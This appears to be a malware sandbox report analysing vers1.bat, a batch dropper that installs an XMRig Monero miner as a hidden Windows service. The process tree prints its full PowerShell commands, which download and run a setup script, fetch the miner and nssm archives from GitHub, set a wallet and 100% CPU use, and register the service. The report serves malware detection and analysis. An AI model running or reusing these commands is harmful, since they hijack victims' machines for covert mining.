Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
1199s -
max time network
1168s -
platform
windows11-21h2_x64 -
resource
win11-20240611-en -
resource tags
arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system -
submitted
25/06/2024, 16:25
Static task
static1
Behavioral task
behavioral1
Sample
vers1.bat
Resource
win11-20240611-en
Behavioral task
behavioral2
Sample
vers1.bat
Resource
win10-20240611-en
Behavioral task
behavioral3
Sample
vers1.bat
Resource
win10v2004-20240611-en
General
-
Target
vers1.bat
-
Size
393B
-
MD5
ece9925dc634f1cc20e3fd7ff7a144bd
-
SHA1
8816112e72b7b64a668bf7214999d855a7e05bde
-
SHA256
a84009aa12f35d93284297647c2714df7f5b0a04d2e0732c689740920ea1421f
-
SHA512
bf80fdf5fa8c00a0ddb773bed073d33b67bf6189b87b803f6fea7071e49dfdeb86cf2142175d9287fbc7bcfd639c42d848e9331f8bc7e68dacaaa33901432243
Malware Config
Extracted
https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat
Extracted
https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip
Extracted
https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip
Signatures
-
XMRig Miner payload 54 IoCs
resource yara_rule behavioral4/files/0x000100000002aab4-76.dat family_xmrig behavioral4/files/0x000100000002aab4-76.dat xmrig behavioral4/memory/2616-79-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-202-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-203-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-204-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-205-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-207-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-208-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-209-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-210-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-211-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-212-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-213-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-214-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-215-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-216-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-217-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-218-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-219-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-220-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-221-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-222-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-223-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-224-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-225-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-226-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-227-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-228-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-229-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-230-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-231-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-232-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-233-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-235-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-236-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-237-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-238-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-239-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-240-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-241-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-242-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-243-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-244-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-245-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-246-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-247-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-248-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-249-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-250-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-251-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-252-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-253-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral4/memory/2972-254-0x0000000000400000-0x000000000102B000-memory.dmp xmrig -
Blocklisted process makes network request 4 IoCs
flow pid Process 4 4168 powershell.exe 7 4168 powershell.exe 13 5068 powershell.exe 15 2728 powershell.exe -
Executes dropped EXE 9 IoCs
pid Process 2616 xmrig.exe 772 nssm.exe 3180 nssm.exe 4332 nssm.exe 2364 nssm.exe 4684 nssm.exe 2004 nssm.exe 2384 nssm.exe 2972 xmrig.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 1 raw.githubusercontent.com 7 raw.githubusercontent.com 13 raw.githubusercontent.com 15 raw.githubusercontent.com -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4088 sc.exe 4024 sc.exe 2840 sc.exe 3996 sc.exe -
pid Process 4168 powershell.exe 5068 powershell.exe 1716 powershell.exe 4064 powershell.exe 2600 powershell.exe 2908 powershell.exe 4452 powershell.exe 1252 powershell.exe 4812 powershell.exe 2728 powershell.exe 2600 powershell.exe 4548 powershell.exe 1988 powershell.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1556 timeout.exe -
Kills process with taskkill 1 IoCs
pid Process 4904 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4168 powershell.exe 4168 powershell.exe 5068 powershell.exe 5068 powershell.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 4548 powershell.exe 4548 powershell.exe 124 taskmgr.exe 2600 powershell.exe 2600 powershell.exe 124 taskmgr.exe 2908 powershell.exe 2908 powershell.exe 4452 powershell.exe 4452 powershell.exe 124 taskmgr.exe 1716 powershell.exe 1716 powershell.exe 1252 powershell.exe 1252 powershell.exe 124 taskmgr.exe 1988 powershell.exe 1988 powershell.exe 4812 powershell.exe 4812 powershell.exe 124 taskmgr.exe 4064 powershell.exe 4064 powershell.exe 2728 powershell.exe 2728 powershell.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 2600 powershell.exe 2600 powershell.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 124 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 18 IoCs
description pid Process Token: SeDebugPrivilege 4168 powershell.exe Token: SeDebugPrivilege 4904 taskkill.exe Token: SeDebugPrivilege 5068 powershell.exe Token: SeDebugPrivilege 124 taskmgr.exe Token: SeSystemProfilePrivilege 124 taskmgr.exe Token: SeCreateGlobalPrivilege 124 taskmgr.exe Token: SeDebugPrivilege 4548 powershell.exe Token: SeDebugPrivilege 2600 powershell.exe Token: SeDebugPrivilege 2908 powershell.exe Token: SeDebugPrivilege 4452 powershell.exe Token: SeDebugPrivilege 1716 powershell.exe Token: SeDebugPrivilege 1252 powershell.exe Token: SeDebugPrivilege 1988 powershell.exe Token: SeDebugPrivilege 4812 powershell.exe Token: SeDebugPrivilege 4064 powershell.exe Token: SeDebugPrivilege 2728 powershell.exe Token: SeDebugPrivilege 2600 powershell.exe Token: SeLockMemoryPrivilege 2972 xmrig.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 2972 xmrig.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe 124 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4496 wrote to memory of 4168 4496 cmd.exe 82 PID 4496 wrote to memory of 4168 4496 cmd.exe 82 PID 4168 wrote to memory of 1532 4168 powershell.exe 83 PID 4168 wrote to memory of 1532 4168 powershell.exe 83 PID 1532 wrote to memory of 4540 1532 cmd.exe 84 PID 1532 wrote to memory of 4540 1532 cmd.exe 84 PID 4540 wrote to memory of 2372 4540 net.exe 85 PID 4540 wrote to memory of 2372 4540 net.exe 85 PID 1532 wrote to memory of 392 1532 cmd.exe 86 PID 1532 wrote to memory of 392 1532 cmd.exe 86 PID 1532 wrote to memory of 2704 1532 cmd.exe 87 PID 1532 wrote to memory of 2704 1532 cmd.exe 87 PID 1532 wrote to memory of 244 1532 cmd.exe 88 PID 1532 wrote to memory of 244 1532 cmd.exe 88 PID 1532 wrote to memory of 412 1532 cmd.exe 89 PID 1532 wrote to memory of 412 1532 cmd.exe 89 PID 1532 wrote to memory of 5072 1532 cmd.exe 90 PID 1532 wrote to memory of 5072 1532 cmd.exe 90 PID 1532 wrote to memory of 4088 1532 cmd.exe 91 PID 1532 wrote to memory of 4088 1532 cmd.exe 91 PID 1532 wrote to memory of 4024 1532 cmd.exe 92 PID 1532 wrote to memory of 4024 1532 cmd.exe 92 PID 1532 wrote to memory of 4904 1532 cmd.exe 93 PID 1532 wrote to memory of 4904 1532 cmd.exe 93 PID 1532 wrote to memory of 1556 1532 cmd.exe 95 PID 1532 wrote to memory of 1556 1532 cmd.exe 95 PID 1532 wrote to memory of 5068 1532 cmd.exe 96 PID 1532 wrote to memory of 5068 1532 cmd.exe 96 PID 1532 wrote to memory of 4548 1532 cmd.exe 98 PID 1532 wrote to memory of 4548 1532 cmd.exe 98 PID 1532 wrote to memory of 2600 1532 cmd.exe 99 PID 1532 wrote to memory of 2600 1532 cmd.exe 99 PID 1532 wrote to memory of 2616 1532 cmd.exe 100 PID 1532 wrote to memory of 2616 1532 cmd.exe 100 PID 1532 wrote to memory of 4628 1532 cmd.exe 101 PID 1532 wrote to memory of 4628 1532 cmd.exe 101 PID 4628 wrote to memory of 2908 4628 cmd.exe 102 PID 4628 wrote to memory of 2908 4628 cmd.exe 102 PID 2908 wrote to memory of 1432 2908 powershell.exe 103 PID 2908 wrote to memory of 1432 2908 powershell.exe 103 PID 1532 wrote to memory of 4452 1532 cmd.exe 104 PID 1532 wrote to memory of 4452 1532 cmd.exe 104 PID 1532 wrote to memory of 1716 1532 cmd.exe 105 PID 1532 wrote to memory of 1716 1532 cmd.exe 105 PID 1532 wrote to memory of 1252 1532 cmd.exe 106 PID 1532 wrote to memory of 1252 1532 cmd.exe 106 PID 1532 wrote to memory of 1988 1532 cmd.exe 107 PID 1532 wrote to memory of 1988 1532 cmd.exe 107 PID 1532 wrote to memory of 4812 1532 cmd.exe 108 PID 1532 wrote to memory of 4812 1532 cmd.exe 108 PID 1532 wrote to memory of 4064 1532 cmd.exe 109 PID 1532 wrote to memory of 4064 1532 cmd.exe 109 PID 1532 wrote to memory of 2728 1532 cmd.exe 110 PID 1532 wrote to memory of 2728 1532 cmd.exe 110 PID 1532 wrote to memory of 2600 1532 cmd.exe 111 PID 1532 wrote to memory of 2600 1532 cmd.exe 111 PID 1532 wrote to memory of 3996 1532 cmd.exe 112 PID 1532 wrote to memory of 3996 1532 cmd.exe 112 PID 1532 wrote to memory of 2840 1532 cmd.exe 113 PID 1532 wrote to memory of 2840 1532 cmd.exe 113 PID 1532 wrote to memory of 772 1532 cmd.exe 114 PID 1532 wrote to memory of 772 1532 cmd.exe 114 PID 1532 wrote to memory of 3180 1532 cmd.exe 115 PID 1532 wrote to memory of 3180 1532 cmd.exe 115
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\vers1.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4168 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB9BB.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"3⤵
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Windows\system32\net.exenet session4⤵
- Suspicious use of WriteProcessMemory
PID:4540 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session5⤵PID:2372
-
-
-
C:\Windows\system32\where.exewhere powershell4⤵PID:392
-
-
C:\Windows\system32\where.exewhere find4⤵PID:2704
-
-
C:\Windows\system32\where.exewhere findstr4⤵PID:244
-
-
C:\Windows\system32\where.exewhere tasklist4⤵PID:412
-
-
C:\Windows\system32\where.exewhere sc4⤵PID:5072
-
-
C:\Windows\system32\sc.exesc stop moneroocean_miner4⤵
- Launches sc.exe
PID:4088
-
-
C:\Windows\system32\sc.exesc delete moneroocean_miner4⤵
- Launches sc.exe
PID:4024
-
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im xmrig.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4904
-
-
C:\Windows\system32\timeout.exetimeout 54⤵
- Delays execution with timeout.exe
PID:1556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4548
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2600
-
-
C:\Users\Admin\moneroocean\xmrig.exe"C:\Users\Admin\moneroocean\xmrig.exe" --help4⤵
- Executes dropped EXE
PID:2616
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"4⤵
- Suspicious use of WriteProcessMemory
PID:4628 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\system32\HOSTNAME.EXE"C:\Windows\system32\HOSTNAME.EXE"6⤵PID:1432
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10001\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Niojevyy\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1252
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2600
-
-
C:\Windows\system32\sc.exesc stop moneroocean_miner4⤵
- Launches sc.exe
PID:3996
-
-
C:\Windows\system32\sc.exesc delete moneroocean_miner4⤵
- Launches sc.exe
PID:2840
-
-
C:\Users\Admin\moneroocean\nssm.exe"C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"4⤵
- Executes dropped EXE
PID:772
-
-
C:\Users\Admin\moneroocean\nssm.exe"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"4⤵
- Executes dropped EXE
PID:3180
-
-
C:\Users\Admin\moneroocean\nssm.exe"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS4⤵
- Executes dropped EXE
PID:4332
-
-
C:\Users\Admin\moneroocean\nssm.exe"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"4⤵
- Executes dropped EXE
PID:2364
-
-
C:\Users\Admin\moneroocean\nssm.exe"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"4⤵
- Executes dropped EXE
PID:4684
-
-
C:\Users\Admin\moneroocean\nssm.exe"C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner4⤵
- Executes dropped EXE
PID:2004
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /01⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:124
-
C:\Users\Admin\moneroocean\nssm.exeC:\Users\Admin\moneroocean\nssm.exe1⤵
- Executes dropped EXE
PID:2384 -
C:\Users\Admin\moneroocean\xmrig.exe"C:\Users\Admin\moneroocean\xmrig.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2972
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD55f4c933102a824f41e258078e34165a7
SHA1d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
Filesize
1KB
MD571de3d4e6a902c41e5d87b031a5a1910
SHA138da8e3af858eb6ad51af0aca573ed73c244cb21
SHA25619c786a0d1be5f808940dfb0bfcdf3e78a1e4881cb326fabe044b9c7c2970466
SHA512c3811686eead6874ad81483349e693e1ba89ef4c38d001cfdc5e49c5085d13649940a623a2e3cfd12d3ff887e6d12c11b3a832b09e00577d623cf4d7c03f7554
-
Filesize
1KB
MD5f35ff7b133da0a47bd9b410ea8b7884e
SHA1549e9f82b341334b12e00da864739382de5f845a
SHA2567212390e5727ce647c1b123b31df15398cf973e35ea1e3cee92ce2b5ee3d1602
SHA512a6909feea75a3e69b714fd3e336395cd2985164a2812babc45a90d482eca26eca663e7b3da5afcf03a90ff54df5402dc1d392d3c5a41f270e59584fe96bd42f1
-
Filesize
1KB
MD5b0c2243b1e96caf557c196512cbe6788
SHA109fa057e5b03a6a54ecfe54467bbf9e7b059ff8b
SHA256253e87a3b127d83ac56aa2fd3f15c82559715c817227312ac3ec0cd27f6ad84f
SHA51207af9f32bb45fdcf744c1637a06e608e30cec6a0eaed5db02cb4bcd905c4ac55e13ef2f2b796c00e02974c99efd8612f2ece427676dcd9ad320d69dcbf404036
-
Filesize
1KB
MD5950ff664994cadcbeb894a9843e56ccb
SHA1c2e4380567b95ef9d4994b79b08fa79a8085311e
SHA2566dd5fe529af57ff4dcada6017ae35c40828c7cb964395dbc49da19dd48a0912a
SHA5121967d8b47b389e91707d419495c614a2fdf276d93ea93cb5f05cb12d7c90ec4125c1f027d5abaa9df9331869ff7ff16fc9b836f071d6a299d405c9ab8a19b202
-
Filesize
1KB
MD516d0bd640ab6a022a57f48e0c7ef5e16
SHA171770e9e1468ddbc328c348464e6ce3d729d9e9a
SHA256176145ec96182f124b797ea12db3419427ec2fb07b9210b1ec83750fd86eddd5
SHA51236d1558b6ba6cbd7a47f0bd9c5fc3daff14fe8e32c74b4eca4a327fc14f5bee9045231273ef760bbdd06f3259900d75a35a59826955702c7f252155eb4a735d5
-
Filesize
1KB
MD54261ffdf62571a5786f7dd549efb9d80
SHA14aaf955269902e0060b3f0111173278ac383ed66
SHA256d503cc03a4f2a2fe4be5e1b3695d921eb1bd858b32a1b4798cc15a1c2f2c447e
